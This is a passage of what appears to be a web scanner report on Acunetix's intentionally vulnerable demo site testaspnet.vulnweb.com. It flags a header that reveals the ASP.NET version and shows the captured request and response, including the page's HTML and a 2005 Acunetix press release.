07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (342 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:18 GMT Content-Length: 30454Response body (30454 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q944e4UqgWJpySuZGYD9y7m9ZXo/Q==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, 